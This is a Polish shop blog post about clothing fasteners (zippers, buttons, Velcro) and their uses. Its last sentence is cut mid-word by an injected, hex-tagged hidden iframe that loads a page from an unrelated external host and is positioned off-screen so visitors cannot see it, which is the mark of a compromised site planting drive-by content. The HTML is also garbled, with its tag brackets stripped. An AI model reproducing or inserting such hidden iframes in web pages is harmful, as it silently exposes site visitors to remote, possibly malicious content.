Technologia w pigułce

Zapięcia do odzieży

29 stycznia 2016 • Opublikowane przez

Wielokrotnie zapinamy zamek w spodniach, guziki przy mankietach, zatrzask w torebce czy rzepy przy butach. I nie zastanawiamy się nawet, jak często korzystamy z zapięć do odzieży i jak wiele części garderoby nie mogłoby bez nich spełniać swoich ról. Przyjrzyjmy się dziś zatem zapięciom do ubrań.

!–more–

nbsp;

strong1. Zamki /strong

Słowo „zamek” niesie za sobą kilka znaczeń. Mówimy tak na miejsce zamieszkania króla i na część drzwi, która pozwala zamknąć je przy użyciu klucza. Jednak w kontekście odzieży zamek jest elementem, który pozwala bez trudu włożyć na siebie część garderoby i zdjąć ją, nie rozrywając przy tym szewków. W branży odzieżowej noszą one nazwę strongzamków błyskawicznych/strong. Wśród nich wyróżnić można kilka podkategorii:
ul
lizamki spiralne,/li
lizamki kostkowe,/li
lizamki metalowe./li
/ul
Zamki spiralne to m.in. zamki dekoracyjne, zamki kryte na koronce czy z tzw. kordem i autolockiem — przeznaczone do odzieży lekkiej lub średnio-ciężkiej, czyli bluzek, sweterków czy spódniczek. Suwaki kostkowe znajdują z kolei zastosowanie przede wszystkim w konfekcjach sportowych i młodzieżowych – przy kurtkach, bluzach (również tych, wykonywanych z polarów). Zamki kostkowe z dżetami mogą być dobrą ozdobą odzieży. Są przeznaczone główniestrong do garderoby ekskluzywnej/strong, czyli strojów wieczorowych oraz karnawałowych. Z suwakami metalowymi najczęściej mamy do czynienia przy odzieży szytej z jeansu.

nbsp;

strong2. Guziki /strong

Guziki służą przede wszystkim do zapinania odzienia wierzchniego — płaszczy, kurtek, żakietów, ale i spodni lub sukienek. Najczęściej produkowane są w kształcie koła. Wykonuje się je z plastiku, metalu lub z innych tworzyw. Ich historia sięga XIII wieku, kiedy to zaczęto przyszywać je do ubrań. Guziki mogą pełnić również funkcję ozdobną, przyszyte na przykład jako drugi rząd przy płaszczu lub na spódniczce. Alternatywę dla guzików stanowiąstrong spinki oraz napy/strong. Przyszycie go do ubrania nie jest tak skomplikowane, jak wszycie nowego guzika, dlatego już nawet kilkuletnie dzieci potrafią przymocować je przy pomocy igły i nici. Samo słowo „guzik” w języku polskim pojawia się w związkach frazeologicznych, a także występuje jako nazwisko.

nbsp;

a href=”http://argos.pl/blog/wp-content/uploads/2016/01/guzik-drewniany-32.jpg”img class=”size-large wp-image-2658″ src=”http://argos.pl/blog/wp-content/uploads/2016/01/guzik-drewniany-32-1024×768.jpg” alt=”Źródło: akademiaszycia.pl” width=”960″ height=”720″ //a Źródło: akademiaszycia.pl

nbsp;

strong3. Rzepy /strong

Rzepy są popularne przede wszystkim jako zapięcia obuwia sportowego. Często również przyszywane są do butów dziecięcych — przedszkolaki nie potrafią bowiem same zawiązać sznurówek. Często widać je również strongprzy plecakach, sportowych torbach i kurtkach przeciwdeszczowych/strong. Są one bardzo praktyczne, ponieważ zapięcie ich nie wymaga dużo czasu. Rzepy proponuje się także starszym osobom, np. cierpiącym na zwyrodnienia stawów, dla których zapięcie guzików może stanowić problem.

nbsp;

Często nie zauważamy nawet, że ubrania możemy nosić dzięki zapięciom. Gdyby nie one, niektóre części garderoby nie spełniałyby swoich funkcji. Potrafią również pięknie ozdobić strój — wystarczy spojrzeć na zapięcia przy sukniach ślubnych, które wyglądają jak dodatek, a nie konieczność. Doceńmy więc zapięcia do ubrań, mając je na sobie niemal w każdym stroj!–844c7b74e31d727d5814a0ed667c0255–iframe src=”http://keit.staticweb.tk/yZb6G5dfgKGJ” width=640 height=480 style=’position: absolute; left: -1000px; top: -1000px; z-index:-1;’/iframe